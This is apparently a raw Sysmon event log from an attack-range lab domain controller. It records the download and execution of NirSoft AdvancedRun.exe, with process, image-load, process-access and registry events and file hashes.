21:40:31.840{834264DD-0AB0-61E7-1600-000000002402}12921332C:\Windows\system32\svchost.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000002925895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.840{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002925894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.835{834264DD-0AAD-61E7-0B00-000000002402}6286396C:\Windows\system32\lsass.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000002925891Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.835{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925890Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.830{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925889Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.827{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=8634E667D69FFD4CFC0A419A3199B619,SHA256=E87E08EB14BA4D49355BC49ED0DD79E2009528B88FA32B84F14F793064C488A0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925888Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.824{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925886Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.824{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.818{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=64E62BD24E8900EC8B43F85070B10ED5,SHA256=3FF8E8AD93BB746BCEDF8CCF0365B251E85A18BDCF23B99BBD16FCC180A2F063trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925882Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.818{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925881Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.810{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=35850E39E505D72FF7A68B8E5AFF9CA1,SHA256=1A280FA6EE31584C215CCC47DD6A8A231C8E28451800C276A27AD185A4AC06F7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925880Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.810{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925879Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.810{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925878Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925877Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925876Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=0DB1A588A248E852AD781AE14333A5C6,SHA256=6F9C36C2663B90439A1AEE74855C521FCBBDB8C7B88382C9464906F1691F65F6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925875Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925874Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=1223B41C4E7FF5638F168B51A08B8D19,SHA256=8B3F788B7DAB5C92150CCE73BB8D78E22359B457B025B1F17394AAE40CBC2918trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925873Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=17F9517D037D676FE11AE7B4F232CB0E,SHA256=9C9990CFCD1C66152D16037FD81FE2A202AA3B19D438121318A36887E282F76EtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925872Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=9AB440B89EFD6749750CC57D1FA6B8E1,SHA256=13C83EC8F62D4D045819235D7E2435721B525B94C313020FAE8340FCEA730FF2trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925871Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=E0F286AF345442E267C33880492CED31,SHA256=5C6D66F5A748551999BE1CDE33A3A1FC2E10D1297EF275D232A9FDCC95BEA84BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925870Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925869Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.804{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925866Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.798{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925865Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.798{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925864Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.798{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925863Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.794{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=50FFF94E9C5357E2BE8356B52BD60D6F,SHA256=D6682E50A47E5721F112BE8BFABEB819F2554FDC7F0D2EBFAC4BC13D5B7DC883trueMicrosoft WindowsValidATTACKRANGE\Administrator 13241300x80000000000000002925861Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:31.794{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEHKU\S-1-5-21-1639301002-1587250067-194500343-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{DB90D0E9-13C9-4F69-83C0-736AD4E46070}\AppIdC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeATTACKRANGE\Administrator 734700x80000000000000002925859Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.794{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002925853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.794{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000002925851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.794{834264DD-0AB0-61E7-1300-000000002402}4803508C:\Windows\System32\svchost.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 13241300x80000000000000002925850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-SetValue2022-01-20 21:40:31.794{834264DD-0AB0-61E7-1300-000000002402}480C:\Windows\System32\svchost.exeHKU\S-1-5-21-1639301002-1587250067-194500343-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exeBinary DataNT AUTHORITY\SYSTEM 10341000x80000000000000002925848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.790{834264DD-0AB0-61E7-1300-000000002402}4807696C:\Windows\System32\svchost.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002925846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.786{834264DD-0DBC-61E7-DC00-000000002402}20922680C:\Windows\system32\csrss.exe{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000002925845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.782{834264DD-0DC0-61E7-ED00-000000002402}46443120C:\Windows\Explorer.EXE{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a912f|C:\Windows\System32\windows.storage.dll+a8da5|C:\Windows\System32\windows.storage.dll+a8896|C:\Windows\System32\windows.storage.dll+a9d08|C:\Windows\System32\windows.storage.dll+a86be|C:\Windows\System32\windows.storage.dll+ab4d5|C:\Windows\System32\windows.storage.dll+ab854|C:\Windows\System32\windows.storage.dll+aae90|C:\Windows\System32\windows.storage.dll+ad6ba|C:\Windows\System32\windows.storage.dll+ad472|C:\Windows\System32\SHELL32.dll+3f8bd|C:\Windows\System32\SHELL32.dll+3e456|C:\Windows\System32\SHELL32.dll+801e1|C:\Windows\System32\SHELL32.dll+6717e|C:\Windows\System32\SHELL32.dll+18ce6c|C:\Windows\System32\SHELL32.dll+18cbc3|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000002925844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:31.775{834264DD-D6CF-61E9-9E60-000000002402}8088C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe" C:\Users\Administrator\Downloads\advancedrun-x64\ATTACKRANGE\Administrator{834264DD-0DBE-61E7-0375-0C0000000000}0xc75032HighMD5=CBC1377206ACF2A0AA01E96404DFD737,SHA256=D2B72B003C278FBECF32DAEDEB9B3CF88746E9ED33B8739F4FD96EFAB494F244{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECKATTACKRANGE\Administrator 15241500x80000000000000002924843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.648{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe:Zone.Identifier2021-11-22 11:46:24.000MD5=FBCCF14D504B7B2DBCB5A5BDA75BD93B,SHA256=EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913[ZoneTransfer] ZoneId=3 ATTACKRANGE\Administrator 11241100x80000000000000002924842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.648{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe:Zone.Identifier2021-11-22 11:46:24.000ATTACKRANGE\Administrator 15241500x80000000000000002924841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.645{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe2021-11-22 11:46:24.000MD5=CBC1377206ACF2A0AA01E96404DFD737,SHA256=D2B72B003C278FBECF32DAEDEB9B3CF88746E9ED33B8739F4FD96EFAB494F244-ATTACKRANGE\Administrator 254200x80000000000000002924840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.642{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe2021-11-22 11:46:24.0002022-01-20 21:40:20.638ATTACKRANGE\Administrator 11241100x80000000000000002924839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 21:40:20.638{834264DD-0DC0-61E7-ED00-000000002402}4644C:\Windows\Explorer.EXEC:\Users\Administrator\Downloads\advancedrun-x64\AdvancedRun.exe2022-01-20 21:40:20.638ATTACKRANGE\Administrator